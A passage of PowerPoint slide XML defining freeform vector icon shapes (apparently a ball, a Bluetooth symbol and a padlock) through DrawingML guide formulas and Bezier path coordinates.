              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854E4B31-FC87-4904-AF59-18E894A73CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8923113" y="4301357"/>
            <a:ext cx="275459" cy="336378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
              <a:gd name="T19" fmla="*/ 261578 h 256"/>
              <a:gd name="T20" fmla="*/ 32412 w 144"/>
              <a:gd name="T21" fmla="*/ 324941 h 256"/>
              <a:gd name="T22" fmla="*/ 19447 w 144"/>
              <a:gd name="T23" fmla="*/ 331440 h 256"/>
              <a:gd name="T24" fmla="*/ 0 w 144"/>
              <a:gd name="T25" fmla="*/ 311944 h 256"/>
              <a:gd name="T26" fmla="*/ 6482 w 144"/>
              <a:gd name="T27" fmla="*/ 298946 h 256"/>
              <a:gd name="T28" fmla="*/ 95614 w 144"/>
              <a:gd name="T29" fmla="*/ 207963 h 256"/>
              <a:gd name="T30" fmla="*/ 6482 w 144"/>
              <a:gd name="T31" fmla="*/ 116979 h 256"/>
              <a:gd name="T32" fmla="*/ 0 w 144"/>
              <a:gd name="T33" fmla="*/ 103981 h 256"/>
              <a:gd name="T34" fmla="*/ 19447 w 144"/>
              <a:gd name="T35" fmla="*/ 84485 h 256"/>
              <a:gd name="T36" fmla="*/ 32412 w 144"/>
              <a:gd name="T37" fmla="*/ 90984 h 256"/>
              <a:gd name="T38" fmla="*/ 97235 w 144"/>
              <a:gd name="T39" fmla="*/ 154347 h 256"/>
              <a:gd name="T40" fmla="*/ 97235 w 144"/>
              <a:gd name="T41" fmla="*/ 19496 h 256"/>
              <a:gd name="T42" fmla="*/ 116682 w 144"/>
              <a:gd name="T43" fmla="*/ 0 h 256"/>
              <a:gd name="T44" fmla="*/ 129646 w 144"/>
              <a:gd name="T45" fmla="*/ 6499 h 256"/>
              <a:gd name="T46" fmla="*/ 226881 w 144"/>
              <a:gd name="T47" fmla="*/ 103981 h 256"/>
              <a:gd name="T48" fmla="*/ 233363 w 144"/>
              <a:gd name="T49" fmla="*/ 116979 h 256"/>
              <a:gd name="T50" fmla="*/ 226881 w 144"/>
              <a:gd name="T51" fmla="*/ 129977 h 256"/>
              <a:gd name="T52" fmla="*/ 136128 w 144"/>
              <a:gd name="T53" fmla="*/ 349312 h 256"/>
              <a:gd name="T54" fmla="*/ 186366 w 144"/>
              <a:gd name="T55" fmla="*/ 298946 h 256"/>
              <a:gd name="T56" fmla="*/ 136128 w 144"/>
              <a:gd name="T57" fmla="*/ 248580 h 256"/>
              <a:gd name="T58" fmla="*/ 136128 w 144"/>
              <a:gd name="T59" fmla="*/ 349312 h 256"/>
              <a:gd name="T60" fmla="*/ 136128 w 144"/>
              <a:gd name="T61" fmla="*/ 66613 h 256"/>
              <a:gd name="T62" fmla="*/ 136128 w 144"/>
              <a:gd name="T63" fmla="*/ 167345 h 256"/>
              <a:gd name="T64" fmla="*/ 186366 w 144"/>
              <a:gd name="T65" fmla="*/ 116979 h 256"/>
              <a:gd name="T66" fmla="*/ 136128 w 144"/>
              <a:gd name="T67" fmla="*/ 66613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44" h="256">
                <a:moveTo>
                  <a:pt x="140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3" y="178"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="187"/>
                  <a:pt x="143" y="190"/>
                  <a:pt x="140" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="255"/>
                  <a:pt x="75" y="256"/>
                  <a:pt x="72" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="256"/>
                  <a:pt x="60" y="251"/>
                  <a:pt x="60" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161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18" y="203"/>
                  <a:pt x="15" y="204"/>
                  <a:pt x="12" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="204"/>
                  <a:pt x="0" y="199"/>
                  <a:pt x="0" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="189"/>
                  <a:pt x="1" y="186"/>
                  <a:pt x="4" y="184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0"/>
                  <a:pt x="0" y="67"/>
                  <a:pt x="0" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="5" y="52"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="52"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="20" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95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75" y="0"/>
                  <a:pt x="78" y="1"/>
                  <a:pt x="80" y="4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3" y="66"/>
                  <a:pt x="144" y="69"/>
                  <a:pt x="144" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="75"/>
                  <a:pt x="143" y="78"/>
                  <a:pt x="140" y="80"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="84" y="215"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="215"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="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11" name="Freeform 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA559715-1923-43C9-B40A-C2309DA2909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8029450" y="2603366"/>
            <a:ext cx="303353" cy="353750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="180" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="167" y="34"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="133" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="14"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="35" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="17" y="136"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="8" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="286"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="207" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="150"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="51" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="29"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="20"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="151" y="45"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="187" y="279"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="285"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="24" y="283"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="158"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="183" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="189" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="113" y="190"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="111" y="183"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="179"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="187"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="228"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="214"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="207" h="303">
                <a:moveTo>
                  <a:pt x="180" y="132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="45"/>
                </a:lnTo>
